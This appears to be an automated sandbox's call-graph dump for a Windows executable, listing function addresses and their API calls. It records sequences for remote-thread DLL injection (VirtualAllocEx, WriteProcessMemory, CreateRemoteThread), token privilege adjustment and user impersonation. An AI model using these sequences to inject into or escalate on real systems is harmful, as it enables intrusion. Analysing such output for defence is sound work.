3829->4439 3831 4065f1 GetModuleHandleW 4444 40645e 3831->4444 3835 406597 3 API calls 3834->3835 3836 406450 3835->3836 4518 406398 3836->4518 3839 408910 3840 408924 3839->3840 3841 4055f9 6 API calls 3840->3841 3842 4088df 3841->3842 3842->3710 3850 404c3c 3843->3850 3845 405467 3853 4047af wcslen 3845->3853 3848 405494 3848->3724 3848->3728 3849 40548f LoadLibraryW 3849->3848 3851 404c4c GetSystemDirectoryW 3850->3851 3852 404c5d wcscpy 3850->3852 3851->3852 3852->3845 3854 4047ba 3853->3854 3855 4047cf wcscat LoadLibraryW 3853->3855 3854->3855 3856 4047c2 wcscat 3854->3856 3855->3848 3855->3849 3856->3855 3857->3742 3859 404958 malloc 3858->3859 3860 40499e 3858->3860 3862 404994 3859->3862 3863 404979 3859->3863 3860->3742 3862->3742 3864 40498d free 3863->3864 3865 40497d memcpy 3863->3865 3864->3862 3865->3864 3867 4055e4 3866->3867 3868 4055d7 free 3866->3868 3867->3743 3868->3867 3870 405516 3869->3870 3871 40550d free 3869->3871 3873 404951 3 API calls 3870->3873 3872 405520 3871->3872 3874 405530 free 3872->3874 3875 405539 3872->3875 3873->3872 3876 405545 memcpy 3874->3876 3877 404951 3 API calls 3875->3877 3876->3742 3878 405544 3877->3878 3878->3876 3880 4055b4 3879->3880 3881 4055a9 free 3879->3881 3882 404951 3 API calls 3880->3882 3883 4055bf 3881->3883 3882->3883 3883->3741 3900 408f92 3884->3900 3887 408ff2 3906 408f72 3887->3906 3888 408fea GetLastError 3889 408f5c 3888->3889 3889->3746 3889->3747 3891 408ff9 3892 409005 GetProcAddress 3891->3892 3893 40901c 3891->3893 3892->3893 3894 409012 LookupPrivilegeValueW 3892->3894 3895 408f72 8 API calls 3893->3895 3894->3893 3896 409035 3895->3896 3897 409053 GetLastError FindCloseChangeNotification 3896->3897 3898 409039 GetProcAddress 3896->3898 3897->3889 3898->3897 3899 409046 AdjustTokenPrivileges 3898->3899 3899->3897 3901 408f72 8 API calls 3900->3901 3902 408f9d 3901->3902 3903 408fa1 GetProcAddress 3902->3903 3904 408fc2 3902->3904 3903->3904 3905 408fb2 3903->3905 3904->3887 3904->3888 3905->3904 3907 408f77 3906->3907 3908 408f8e 3906->3908 3909 405436 8 API calls 3907->3909 3908->3891 3910 408f81 3909->3910 3910->3891 3911->3754 3913 404934 3912->3913 3914 404937 memcpy 3912->3914 3913->3914 3914->3758 3916 401ad6 OpenProcess 3915->3916 3916->3767 3916->3768 4008 404fa4 memset 3917->4008 3919 401745 ReadProcessMemory 3919->3772 3919->3773 3921 405648 3920->3921 3922 40564b 3920->3922 3921->3776 3923 405652 wcslen 3922->3923 3924 40565a 3922->3924 3923->3776 3924->3776 3926 405603 3925->3926 3927 401bdc 3925->3927 3928 405614 3926->3928 3929 405608 wcslen 3926->3929 3933 4022d5 3927->3933 3930 40559a 4 API calls 3928->3930 3929->3928 3931 40561d 3930->3931 3931->3927 3932 405621 memcpy 3931->3932 3932->3927 3934 40b550 3933->3934 3935 4022e2 memset memset memset 3934->3935 3936 404923 2 API calls 3935->3936 3937 402383 wcschr 3936->3937 3938 4023a6 3937->3938 3939 402397 ExpandEnvironmentStringsW 3937->3939 3940 402419 3938->3940 3941 4023ae wcschr 3938->3941 3939->3938 3943 402425 wcschr 3940->3943 3944 40244b 3940->3944 3941->3940 3942 4023c2 memset SearchPathW 3941->3942 3942->3940 3945 402405 3942->3945 3946 40245d 3943->3946 3947 402436 ExpandEnvironmentStringsW 3943->3947 4009 404b5c wcscpy wcsrchr 3944->4009 3949 404923 2 API calls 3945->3949 3950 402537 3946->3950 3952 4024ad memset memset 3946->3952 3947->3946 3949->3940 3951 4025da 3950->3951 3954 402550 memset memset 3950->3954 3955 40265d 3951->3955 3958 402633 3951->3958 3959 4025ed wcschr 3951->3959 4011 4052f3 3952->4011 3957 4052f3 2 API calls 3954->3957 3962 402683 3955->3962 4017 401d1e 3955->4017 3963 402598 3957->3963 3960 402634 _snwprintf 3958->3960 3959->3958 3964 4025fb memset ExpandEnvironmentStringsW 3959->3964 3960->3955 3961 4052f3 2 API calls 3965 40250b _wtoi _wtoi 3961->3965 3967 4026a3 3962->3967 3970 401d1e 4 API calls 3962->3970 3968 4052f3 2 API calls 3963->3968 3964->3960 3965->3950 3971 401d1e 4 API calls 3967->3971 3972 4026c6 3967->3972 3969 4025ae _wtoi _wtoi 3968->3969 3969->3951 3970->3967 3971->3972 3973 401d1e 4 API calls 3972->3973 3974 402707 3972->3974 3973->3974 3975 40276d 3974->3975 3979 402712 3974->3979 3976 402776 3975->3976 3977 40280b SetEnvironmentVariableW 3975->3977 4053 40149f GetEnvironmentStringsW 3976->4053 3999 402768 3977->3999 4023 40135c 3979->4023 3984 40273d 4044 401421 3984->4044 3985 402792 3993 40135c 13 API calls 3985->3993 3986 40288e 3987 4055d1 free 3986->3987 3990 401beb 3987->3990 3990->3788 3991 402748 4052 4054b9 free free 3991->4052 3996 4027a9 3993->3996 4059 401551 3996->4059 4078 401fe6 3999->4078 4001 4027cb 4003 401421 10 API calls 4001->4003 4002 4014e9 12 API calls 4002->4001 4004 4027d6 4003->4004 4076 4054b9 free free 4004->4076 4006 4027f9 4077 4054b9 free free 4006->4077 4008->3919 4010 404b75 4009->4010 4010->3946 4012 4024f5 4011->4012 4013 40530f 4011->4013 4012->3961 4014 40531b wcschr 4013->4014 4015 40532d 4013->4015 4014->4013 4014->4015 4015->4012 4016 40535e memcpy 4015->4016 4016->4012 4018 401d31 4017->4018 4019 401d27 4017->4019 4020 4050e1 4 API calls 4018->4020 4140 4050e1 wcslen wcslen 4019->4140 4022 401d3b 4020->4022 4022->3962 4145 4054b9 free free 4023->4145 4025 40136f wcslen 4026 40559a 4 API calls 4025->4026 4032 40139a 4026->4032 4028 4013d2 4029 4055d1 free 4028->4029 4031 4013da 4029->4031 4030 4054df 7 API calls 4030->4032 4031->3984 4033 4014e9 4031->4033 4032->4028 4032->4030 4146 4053a6 4032->4146 4150 40565d 4033->4150 4035 401516 4036 40565d 7 API calls 4035->4036 4037 401523 4036->4037 4038 40565d 7 API calls 4037->4038 4039 40152e 4038->4039 4040 4054df 7 API calls 4039->4040 4041 401543 4040->4041 4042 4055d1 free 4041->4042 4043 40154b 4042->4043 4043->3984 4045 4055f9 6 API calls 4044->4045 4050 401432 4045->4050 4046 401475 4047 405642 wcslen 4046->4047 4048 40147c 4047->4048 4048->3991 4049 401442 wcschr 4049->4050 4050->4046 4050->4049 4051 40565d 7 API calls 4050->4051 4051->4050 4052->3999 4157 4054b9 free free 4053->4157 4055 4014b5 4056 4014dc FreeEnvironmentStringsW 4055->4056 4057 4014cf wcslen 4055->4057 4058 4054df 7 API calls 4055->4058 4056->3985 4057->4055 4057->4056 4058->4055 4074 401561 4059->4074 4060 40161c 4158 4054b9 free free 4060->4158 4062 401660 4065 4055d1 free 4062->4065 4063 40488d wcslen wcslen _memicmp 4063->4074 4064 401623 4067 4054df 7 API calls 4064->4067 4068 401641 4064->4068 4066 401668 4065->4066 4159 4054b9 free free 4066->4159 4067->4064 4068->4062 4071 4054df 7 API calls 4068->4071 4070 4055f9 6 API calls 4070->4074 4071->4068 4072 401670 4072->4001 4072->4002 4073 4054df 7 API calls 4073->4074 4074->4060 4074->4063 4074->4070 4074->4073 4075 4015e3 _wcsnicmp 4074->4075 4075->4074 4076->4006 4077->3999 4079 4020a8 4078->4079 4080 402008 memset memset 4078->4080 4081 4020f3 4079->4081 4082 4020ad wcslen 4079->4082 4083 404c3c 2 API calls 4080->4083 4085 402162 4081->4085 4086 4020f8 4081->4086 4087 4020c2 4082->4087 4121 4022c8 4082->4121 4084 402049 wcslen wcslen 4083->4084 4088 402070 4084->4088 4089 402087 4084->4089 4090 4021f2 4085->4090 4091 40216b OpenSCManagerW 4085->4091 4186 40598b 4086->4186 4105 4020e6 4087->4105 4106 4020d7 _wtoi 4087->4106 4093 404be4 4 API calls 4088->4093 4160 401df9 4089->4160 4094 402235 4090->4094 4095 4021f7 4090->4095 4096 402183 4091->4096 4097 40217d 4091->4097 4093->4089 4103 4022a0 CreateProcessW 4094->4103 4104 40223a 4094->4104 4224 401d99 wcslen 4095->4224 4211 401f04 memset memset 4096->4211 4205 401306 OpenServiceW 4097->4205 4109 402271 4103->4109 4112 402264 4104->4112 4113 402256 wcschr 4104->4113 4107 401df9 63 API calls 4105->4107 4172 401e44 OpenProcess 4106->4172 4119 4020a6 4107->4119 4116 4022c2 GetLastError 4109->4116 4109->4121 4111 401e44 11 API calls 4111->4119 4268 40289f 4112->4268 4113->4112 4115 402209 4237 40a46c 4115->4237 4116->4121 4119->4121 4202 4028ed 4119->4202 4121->3986 4134 401a3f memset 4121->4134 4122 401df9 63 API calls 4124 4021a7 4122->4124 4125 4021e7 RevertToSelf 4124->4125 4127 4028ed 5 API calls 4124->4127 4125->4121 4129 4021d1 4127->4129 4132 4021d5 GetLastError 4129->4132 4133 4021de CloseHandle 4129->4133 4130 402154 CloseHandle 4130->4121 4131 40214b GetLastError 4131->4130 4132->4133 4133->4125 4135 4052f3 2 API calls 4134->4135 4136 401a8a 4135->4136 4137 401ac0 GetProcessAffinityMask SetProcessAffinityMask 4136->4137 4138 401a8f _wtoi 4136->4138 4137->3986 4139 4052f3 2 API calls 4138->4139 4139->4136 4141 405101 wcscat 4140->4141 4142 405112 4140->4142 4143 40512b 4141->4143 4142->4143 4144 40511a wcsncat 4142->4144 4143->4018 4144->4143 4145->4025 4147 4053bf 4146->4147 4149 4053bb 4146->4149 4148 4053f3 memcpy 4147->4148 4147->4149 4148->4149 4149->4032 4151 405642 wcslen 4150->4151 4152 40566c 4151->4152 4153 405681 4152->4153 4154 405676 wcslen 4152->4154 4155 40559a 4 API calls 4153->4155 4154->4153 4156 40568c memcpy 4155->4156 4156->4035 4157->4055 4158->4064 4159->4072 4161 401e0a 4160->4161 4271 4095fd 4161->4271 4163 401e10 4290 409978 4163->4290 4166 401e2e 4295 4095da 4166->4295 4167 401e1f 4168 401e44 11 API calls 4167->4168 4169 401e2c 4168->4169 4169->4166 4173 401ef3 GetLastError 4172->4173 4174 401e6d 4172->4174 4176 401efb 4173->4176 4175 40289f 5 API calls 4174->4175 4177 401e7e 4175->4177 4176->4119 4178 401ee0 GetLastError 4177->4178 4179 401e98 4177->4179 4181 401ee8 CloseHandle 4178->4181 4180 40289f 5 API calls 4179->4180 4182 401ea3 4180->4182 4181->4176 4183 401ec1 4182->4183 4184 401ecd GetLastError 4182->4184 4185 401ed5 CloseHandle 4183->4185 4184->4185 4185->4181 4350 4095ab 4186->4350 4188 40599f memset 4189 4095fd 49 API calls 4188->4189 4194 4059c6 4189->4194 4190 405a7b 4191 4095da 2 API calls 4190->4191 4192 402103 4191->4192 4192->4111 4192->4121 4194->4190 4195 4059f0 _wcsicmp 4194->4195 4351 409a94 memset memset OpenProcess 4194->4351 4196 405a05 wcschr 4195->4196 4197 405a2b OpenProcess 4195->4197 4196->4194 4198 405a19 _wcsicmp 4196->4198 4197->4194 4199 405a42 OpenProcessToken 4197->4199 4198->4194 4198->4197 4200 405a60 CloseHandle 4199->4200 4201 405a56 CloseHandle 4199->4201 4200->4190 4200->4194 4201->4200 4203 40289f 5 API calls 4202->4203 4204 402147 4203->4204 4204->4130 4204->4131 4206 401350 CloseServiceHandle 4205->4206 4207 40132d QueryServiceStatus 4205->4207 4206->4096 4208 40133c 4207->4208 4209 40134d CloseServiceHandle 4207->4209 4208->4209 4210 401342 StartServiceW 4208->4210 4209->4206 4210->4209 4212 404c3c 2 API calls 4211->4212 4213 401f53 wcslen wcslen 4212->4213 4214 401f8d 4213->4214 4215 401f7a 4213->4215 4217 401df9 63 API calls 4214->4217 4216 404be4 4 API calls 4215->4216 4216->4214 4218 401fae 4217->4218 4219 401fdd 4218->4219 4220 408f48 18 API calls 4218->4220 4219->4121 4219->4122 4221 401fbe ImpersonateLoggedOnUser 4220->4221 4222 401fd4 CloseHandle 4221->4222 4223 401fcc GetLastError 4221->4223 4222->4219 4223->4222 4225 401de9 4224->4225 4226 401daf 4224->4226 4225->4115 4225->4121 4227 401dc5 4226->4227 4228 401dbc _wtoi 4226->4228 4229 4095fd 49 API calls 4227->4229 4228->4225 4230 401dd3 4229->4230 4231 409978 2 API calls 4230->4231 4232 401ddc 4231->4232 4233 401de2 4232->4233 4234 401ded 4232->4234 4235 4095da 2 API calls 4233->4235 4236 4095da 2 API calls 4234->4236 4235->4225 4236->4225 4238 40b550 4237->4238 4239 40a479 OpenProcess 4238->4239 4240 40a4a0 memset GetModuleHandleW 4239->4240 4241 40a6f1 GetLastError 4239->4241 4381 409c70 4240->4381 4243 402225 4241->4243 4243->4121 4245 40a4e5 4247 409c70 6 API calls 4245->4247 4246 40a4ea GetProcAddress 4246->4245 4248 40a4fb 4247->4248 4249 40a50b GetProcAddress 4248->4249 4250 40a506 4248->4250 4249->4250 4251 40a549 4250->4251 4252 404923 2 API calls 4250->4252 4253 40a56a 4251->4253 4254 404923 2 API calls 4251->4254 4252->4251 4255 40a58e VirtualAllocEx VirtualAllocEx 4253->4255 4257 404923 2 API calls 4253->4257 4254->4253 4258 40a6e4 GetLastError 4255->4258 4259 40a5dd 4255->4259 4257->4255 4258->4243 4259->4258 4260 40a5e5 WriteProcessMemory WriteProcessMemory 4259->4260 4385 40a272 GetVersionExW 4260->4385 4263 40a650 GetLastError 4265 40a65b memset ReadProcessMemory VirtualFreeEx VirtualFreeEx 4263->4265 4264 40a634 ResumeThread WaitForSingleObject CloseHandle 4264->4265 4266 40a6af 4265->4266 4266->4243 4267 40a6d9 FreeLibrary 4266->4267 4267->4243 4269 4028a5 LoadLibraryW GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4268->4269 4270 4028ec 4268->4270 4269->4270 4270->4109 4272 4099d4 free 4271->4272 4273 409614 CreateToolhelp32Snapshot memset Process32FirstW 4272->4273 4274 409782 Process32NextW 4273->4274 4275 409799 CloseHandle 4274->4275 4281 409654 4274->4281 4275->4163 4276 40965f OpenProcess 4277 4096b2 memset 4276->4277 4276->4281 4305 4098f9 4277->4305 4280 4096df 4283 4096f7 GetModuleHandleW 4280->4283 4287 40972a QueryFullProcessImageNameW 4280->4287 4310 40920a 4280->4310 4326 409555 4280->4326 4281->4276 4282 409699 OpenProcess 4281->4282 4302 404baf 4281->4302 4332 4099ed 4281->4332 4282->4277 4282->4281 4283->4280 4286 409706 GetProcAddress 4283->4286 4286->4280 4287->4280 4289 409764 CloseHandle 4289->4281 4291 401e1b 4290->4291 4293 409988 4290->4293 4291->4166 4291->4167 4292 409993 _wcsicmp 4292->4291 4292->4293 4293->4291 4293->4292 4294 4099b1 _wcsicmp 4293->4294 4294->4291 4294->4293 4296 4095e0 FreeLibrary 4295->4296 4297 4095ea 4295->4297 4296->4297 4298 4099d4 free 4297->4298 4299 4095f3 4298->4299 4300 4099d4 free 4299->4300 4301 401e36 4300->4301 4301->4119 4303 404bbe GetVersionExW 4302->4303 4304 404bcf 4302->4304 4303->4304 4304->4281 4338 409921 4305->4338 4308 409909 K32GetModuleFileNameExW 4309 40991c 4308->4309 4309->4280 4311 40921d wcschr 4310->4311 4313 40921a wcscpy 4310->4313 4311->4313 4314 40923f 4311->4314 4315 4092eb 4313->4315 4343 40488d wcslen wcslen 4314->4343 4315->4280 4318 409255 memset 4347 404c08 4318->4347 4319 409297 4321 4092e2 wcscpy 4319->4321 4322 40929d memset 4319->4322 4321->4315 4323 404c08 2 API calls 4322->4323 4325 4092c2 memcpy wcscat 4323->4325 4324 40927a wcscpy wcscat 4324->4315 4325->4315 4327 409561 GetModuleHandleW 4326->4327 4328 40958b 4326->4328 4327->4328 4331 409570 GetProcAddress 4327->4331 4329 409594 GetProcessTimes 4328->4329 4330 4095a7 4328->4330 4329->4289 4330->4289 4331->4328 4333 4099f8 4332->4333 4336 409a1c 4332->4336 4334 409a01 free 4333->4334 4335 409a0a 4333->4335 4334->4336 4337 404951 3 API calls 4335->4337 4336->4274 4337->4336 4339 409926 4338->4339 4340 409901 4338->4340 4341 405436 8 API calls 4339->4341 4340->4308 4340->4309 4342 409931 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4341->4342 4342->4340 4344 4048b4 4343->4344 4345 4048d8 4343->4345 4344->4345 4346 4048bc _memicmp 4344->4346 4345->4318 4345->4319 4346->4344 4346->4345 4348 404c18 GetWindowsDirectoryW 4347->4348 4349 404c29 wcscpy 4347->4349 4348->4349 4349->4324 4350->4188 4352 409af6 4351->4352 4353 409c3a 4351->4353 4356 408f92 9 API calls 4352->4356 4354 409c43 _snwprintf 4353->4354 4355 409c67 4353->4355 4354->4355 4355->4194 4357 409b0b 4356->4357 4358 409b16 memset 4357->4358 4359 409b99 4357->4359 4360 408f72 8 API calls 4358->4360 4361 409555 3 API calls 4359->4361 4362 409b3b 4360->4362 4363 409bb1 memset 4361->4363 4364 409c23 CloseHandle 4362->4364 4365 409b43 GetProcAddress 4362->4365 4370 409a46 4363->4370 4364->4353 4367 409c31 FreeLibrary 4364->4367 4365->4364 4368 409b59 4365->4368 4367->4353 4368->4364 4376 40906d 4368->4376 4371 409a71 4370->4371 4372 409a51 4370->4372 4371->4368 4373 405436 8 API calls 4372->4373 4374 409a5b 4373->4374 4374->4371 4375 409a62 GetProcAddress 4374->4375 4375->4371 4377 408f72 8 API calls 4376->4377 4378 40907b 4377->4378 4379 409090 4378->4379 4380 40907f GetProcAddress 4378->4380 4379->4364 4380->4379 4382 409c82 GetModuleHandleW GetProcAddress 4381->4382 4383 409d0b 4381->4383 4382->4383 4384 409cb3 GetModuleHandleW GetProcAddress strlen strlen 4382->4384 4383->4245 4383->4246 4384->4383 4386 40a31d CreateRemoteThread 4385->4386 4387 40a29f 4385->4387 4389 40a2a4 4386->4389 4390 40a1ef 4387->4390 4389->4263 4389->4264 4391 40a1fa LoadLibraryW 4390->4391 4392 40a26d 4390->4392 4391->4392 4393 40a20f GetProcAddress 4391->4393 4392->4389 4393->4392 4407 40a0d7 wcscpy 4394->4407 4396 402ff9 4397 403616 4396->4397 4398 403621 4397->4398 4399 40362e memset 4397->4399 4400 403627 4398->4400 4401 403005 4398->4401 4404 40363e 4399->4404 4408 402caf 4400->4408 4401->3803 4406 40a0d7 wcscpy 4401->4406 4404->4401 4411 402bee 4404->4411 4406->3803 4407->4396 4409 402cb6 GetWindowPlacement 4408->4409 4410 402ccd 4408->4410 4409->4410 4410->4404 4412 402cab 4411->4412 4413 402bfe 4411->4413 4412->4401 4413->4412 4414 402c08 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics 4413->4414 4415 402c46 GetSystemMetrics GetSystemMetrics 4414->4415 4416 402c39 4414->4416 4417 402c3e 4415->4417 4416->4415 4416->4417 4417->4412 4418 402c97 SetWindowPos 4417->4418 4418->4412 4419->3807 4420->3810 4422 401683 4421->4422 4423 4016aa _snwprintf 4422->4423 4424 4054df 7 API calls 4422->4424 4425 401719 4422->4425 4423->4422 4424->4422 4425->3814 4426 4013e1 4425->4426 4427 4055f9 6 API calls 4426->4427 4430 4013f2 4427->4430 4428 40141e 4428->3814 4429 40565d 7 API calls 4429->4430 4430->4428 4430->4429 4431->3808 4438 404ad9 GetModuleFileNameW 4432->4438 4434 401c79 _snwprintf memset ShellExecuteExW 4435 401ce2 WaitForSingleObject GetExitCodeProcess 4434->4435 4436 401d0e GetLastError 4434->4436 4437 401d00 4435->4437 4436->4437 4437->3822 4438->4434 4463 404ad9 GetModuleFileNameW 4439->4463 4441 40659d wcsrchr 4442 4065b0 wcscat 4441->4442 4443 4065ac 4441->4443 4442->3831 4443->4442 4445 40b550 4444->4445 4446 40646b memset memset 4445->4446 4464 404ad9 GetModuleFileNameW 4446->4464 4448 4064b4 4465 40b04d GetFileVersionInfoSizeW 4448->4465 4451 4064d6 wcscpy 4452 4064eb wcscpy wcscpy 4451->4452 4492 405fac 4452->4492 4455 405fac 3 API calls 4456 40652a 4455->4456 4457 405fac 3 API calls 4456->4457 4458 406540 4457->4458 4459 405fac 3 API calls 4458->4459 4460 406553 EnumResourceNamesW EnumResourceNamesW wcscpy 4459->4460 4498 406337 4460->4498 4463->4441 4464->4448 4466 40b073 4465->4466 4467 4064d2 4465->4467 4468 40b07b ??2@YAPAXI GetFileVersionInfoW VerQueryValueW 4466->4468 4467->4451 4467->4452 4469 40b0d0 VerQueryValueW 4468->4469 4470 40b0aa 4468->4470 4471 40b0e7 _snwprintf 4469->4471 4472 40b11f wcscpy 4469->4472 4470->4469 4505 40afbe wcscpy wcscat wcscat wcscat VerQueryValueW 4471->4505 4473 40b12f 4472->4473 4475 40afbe 9 API calls 4473->4475 4477 40b141 4475->4477 4478 40afbe 9 API calls 4477->4478 4479 40b156 4478->4479 4480 40afbe 9 API calls 4479->4480 4481 40b16b 4480->4481 4482 40afbe 9 API calls 4481->4482 4483 40b180 4482->4483 4484 40afbe 9 API calls 4483->4484 4485 40b195 4484->4485 4486 40afbe 9 API calls 4485->4486 4487 40b1aa 4486->4487 4488 40afbe 9 API calls 4487->4488 4489 40b1bf 4488->4489 4490 40afbe 9 API calls 4489->4490 4491 40b1d4 ??3@YAXPAX 4490->4491 4491->4467 4493 40b550 4492->4493 4494 405fb9 memset GetPrivateProfileStringW 4493->4494 4495 406013 WritePrivateProfileStringW 4494->4495 4496 406009 4494->4496 4497 40600f 4495->4497 4496->4495 4496->4497 4497->4455 4499 40b550 4498->4499 4500 406344 memset 4499->4500 4501 406363 LoadStringW 4500->4501 4502 40637d 4501->4502 4502->4501 4504 406395 4502->4504 4515 406025 memset _itow 4502->4515 4504->3702 4506 40b025 4505->4506 4507 40b041 4505->4507 4508 404923 2 API calls 4506->4508 4507->4472 4507->4473 4509 40b039 4508->4509 4511 4049a2 4509->4511 4512 4049b2 lstrcpyW lstrlenW 4511->4512 4513 4049aa 4511->4513 4514 4049c6 4512->4514 4513->4512 4513->4513 4514->4507 4516 405fac 3 API calls 4515->4516 4517 406059 4516->4517 4517->4502 4528 404aaa GetFileAttributesW 4518->4528 4520 4063a1 4521 4063a6 wcscpy wcscpy GetPrivateProfileIntW 4520->4521 4522 40641a CoInitialize 4520->4522 4529 405f14 GetPrivateProfileStringW 4521->4529 4522->3839 4524 4063f5 4530 405f14 GetPrivateProfileStringW 4524->4530 4526 406406 4531 405f14 GetPrivateProfileStringW 4526->4531 4528->4520 4529->4524 4530->4526 4531->4522 4594 406cca 4595 406ce1 4594->4595 4597 406cdc 4594->4597 4598 4031e2 4595->4598 4601 4032f6 SendMessageW 4598->4601 4600 4031fb 4600->4597 4601->4600 4602 403fca 4655 40297e 4602->4655 4605 40297e 2 API calls 4606 404007 4605->4606 4607 40297e 2 API calls 4606->4607 4608 40401c 4607->4608 4658 402a06 4608->4658 4613 4029cb 7 API calls 4614 40404f 4613->4614 4615 4029cb 7 API calls 4614->4615 4616 404061 4615->4616 4617 4029cb 7 API calls 4616->4617 4618 404073 4617->4618 4619 4029cb 7 API calls 4618->4619 4620 404085 4619->4620 4621 4029cb 7 API calls 4620->4621 4622 404097 4621->4622 4674 402952 4622->4674 4625 402952 2 API calls 4626 4040bd 4625->4626 4627 402952 2 API calls 4626->4627 4628 4040d0 4627->4628 4629 402952 2 API calls 4628->4629 4630 4040e3 4629->4630 4631 402952 2 API calls 4630->4631 4632 4040f6 4631->4632 4633 402952 2 API calls 4632->4633 4634 404109 4633->4634 4635 402952 2 API calls 4634->4635 4636 40411c 4635->4636 4637 402952 2 API calls 4636->4637 4638 40412f 4637->4638 4639 40297e 2 API calls 4638->4639 4640 404145 4639->4640 4641 40297e 2 API calls 4640->4641 4642 40415b 4641->4642 4643 40297e 2 API calls 4642->4643 4644 404174 4643->4644 4645 402952 2 API calls 4644->4645 4646 404187 4645->4646 4647 40297e 2 API calls 4646->4647 4648 4041a0 4647->4648 4649 40297e 2 API calls 4648->4649 4650 4041ba 4649->4650 4651 40297e 2 API calls 4650->4651 4652 4041cf 4651->4652 4653 40297e 2 API calls 4652->4653 4654 4041e4 4653->4654 4680 404b81 4655->4680 4657 402996 4657->4605 4659 402a32 4658->4659 4660 402a12 4658->4660 4683 4029f6 GetDlgItem 4659->4683 4663 404b81 2 API calls 4660->4663 4662 402a3f GetWindowTextLengthW 4664 402a72 4662->4664 4665 402a4c 4662->4665 4670 402a2d 4663->4670 4666 4055f9 6 API calls 4664->4666 4667 40559a 4 API calls 4665->4667 4666->4670 4668 402a57 4667->4668 4669 404b81 2 API calls 4668->4669 4669->4670 4671 4029cb 4670->4671 4684 40299c 4671->4684 4675 40295c 4674->4675 4676 40296d 4674->4676 4698 4048e5 SendDlgItemMessageW 4675->4698 4699 404905 SendDlgItemMessageW 4676->4699 4679 402968 4679->4625 4681 404b8a SetDlgItemTextW 4680->4681 4682 404b9b GetDlgItemTextW 4680->4682 4681->4657 4682->4657 4683->4662 4685 4029a6 4684->4685 4686 4029b7 4684->4686 4690 404a44 GetDlgItem SendMessageW 4685->4690 4695 404a09 GetDlgItem SendMessageW 4686->4695 4689 4029b2 4689->4613 4691 404a76 SendMessageW 4690->4691 4694 404a92 4690->4694 4692 404a87 4691->4692 4693 404a99 SendMessageW 4691->4693 4692->4691 4692->4694 4693->4694 4694->4689 4696 404a32 4695->4696 4697 404a36 SendMessageW 4695->4697 4696->4689 4697->4696 4698->4679 4699->4679 4700 40614f 4701 40b550 4700->4701 4702 40615c memset GetDlgCtrlID GetWindowTextW 4701->4702 4703 4061a0 4702->4703 4707 4061fe 4702->4707 4704 4061a9 memset GetClassNameW _wcsicmp 4703->4704 4703->4707 4705 4061f1 4704->4705 4704->4707 4706 406025 5 API calls 4705->4706 4706->4707 4711 40aad4 memset SHGetFileInfoW 4712 40ab23 DestroyIcon 4711->4712 4713 40ab2f 4711->4713 4712->4713 4714 407a55 4715 407a76 4714->4715 4716 407a69 4714->4716 4718 407a8a 4715->4718 4719 407a7b 4715->4719 4735 407491 4716->4735 4721 407a9c 4718->4721 4722 407a8f 4718->4722 4741 407362 4719->4741 4725 407ab0 4721->4725 4726 407aa1 4721->4726 4751 4075bb 4722->4751 4723 407a74 4728 407ac4 4725->4728 4729 407ab5 4725->4729 4759 407639 4726->4759 4731 407ad6 4728->4731 4732 407ac9 4728->4732 4771 407763 memset memset memset memset 4729->4771 4731->4723 4807 4079a4 4731->4807 4793 4074f2 4732->4793 4736 4074de 4735->4736 4740 407499 4735->4740 4818 407343 4736->4818 4739 407343 6 API calls 4739->4740 4740->4736 4740->4739 4747 407377 4741->4747 4749 40747c 4741->4749 4742 407343 6 API calls 4743 40748c 4742->4743 4743->4723 4744 4073a1 wcschr 4745 4073af wcschr 4744->4745 4744->4747 4745->4747 4746 40565d 7 API calls 4746->4747 4747->4744 4747->4746 4748 407343 6 API calls 4747->4748 4747->4749 4750 4055d1 free 4747->4750 4748->4747 4749->4742 4750->4747 4752 407624 4751->4752 4753 4075c9 4751->4753 4755 407343 6 API calls 4752->4755 4753->4752 4754 4075ca _snwprintf 4753->4754 4757 4075fc _snwprintf 4754->4757 4756 407634 4755->4756 4756->4723 4758 407343 6 API calls 4757->4758 4758->4753 4760 407343 6 API calls 4759->4760 4764 407672 4760->4764 4761 40774e 4762 407343 6 API calls 4761->4762 4763 40775d 4762->4763 4763->4723 4764->4761 4767 407702 wcscat 4764->4767 4828 40adc0 _snwprintf 4764->4828 4829 40adf1 4764->4829 4835 40ae90 memset memset 4764->4835 4767->4764 4770 407343 6 API calls 4770->4764 4772 4077e9 4771->4772 4773 40781b 4772->4773 4851 40adc0 _snwprintf 4772->4851 4775 407343 6 API calls 4773->4775 4778 40782a 4775->4778 4776 407804 _snwprintf 4776->4773 4777 407980 4779 407343 6 API calls 4777->4779 4778->4777 4781 407852 wcscpy 4778->4781 4785 40adf1 3 API calls 4778->4785 4786 4078f5 wcscpy 4778->4786 4789 407917 wcscat 4778->4789 4790 40ae90 13 API calls 4778->4790 4852 40adc0 _snwprintf 4778->4852 4853 40adc0 _snwprintf 4778->4853 4780 40798f 4779->4780 4782 407343 6 API calls 4780->4782 4781->4778 4783 40799e 4782->4783 4783->4723 4785->4778 4786->4778 4788 4078db _snwprintf 4788->4778 4789->4778 4791 407932 _snwprintf 4790->4791 4792 407343 6 API calls 4791->4792 4792->4778 4794 407343 6 API calls 4793->4794 4795 407530 4794->4795 4796 407343 6 API calls 4795->4796 4797 407540 4796->4797 4798 407589 4797->4798 4801 407556 _snwprintf 4797->4801 4799 407343 6 API calls 4798->4799 4800 40759f 4799->4800 4802 407343 6 API calls 4800->4802 4803 407343 6 API calls 4801->4803 4804 4075aa 4802->4804 4803->4797 4805 407343 6 API calls 4804->4805 4806 4075b5 4805->4806 4806->4723 4808 407343 6 API calls 4807->4808 4809 4079bd 4808->4809 4811 4079c5 memset 4809->4811 4813 40adf1 3 API calls 4809->4813 4817 407a40 4809->4817 4854 407250 wcscpy 4809->4854 4810 407343 6 API calls 4812 407a50 4810->4812 4811->4809 4812->4723 4813->4809 4815 407a11 _snwprintf 4816 407343 6 API calls 4815->4816 4816->4809 4817->4810 4819 407351 4818->4819 4820 407358 4818->4820 4824 40478b wcslen WriteFile 4819->4824 4825 4072d8 4820->4825 4823 407356 4823->4723 4824->4823 4826 40b550 4825->4826 4827 4072e5 memset WideCharToMultiByte strlen WriteFile 4826->4827 4827->4823 4828->4764 4834 40adfb 4829->4834 4830 40ae6d memcpy 4830->4834 4831 40ae20 memcpy 4831->4834 4832 40ae8c 4832->4764 4833 40ae53 memcpy 4833->4834 4834->4830 4834->4831 4834->4832 4834->4833 4836 40aedc 4835->4836 4837 40aef3 wcscpy 4836->4837 4838 40af77 4836->4838 4839 40af07 _snwprintf wcscat 4837->4839 4840 40af2e 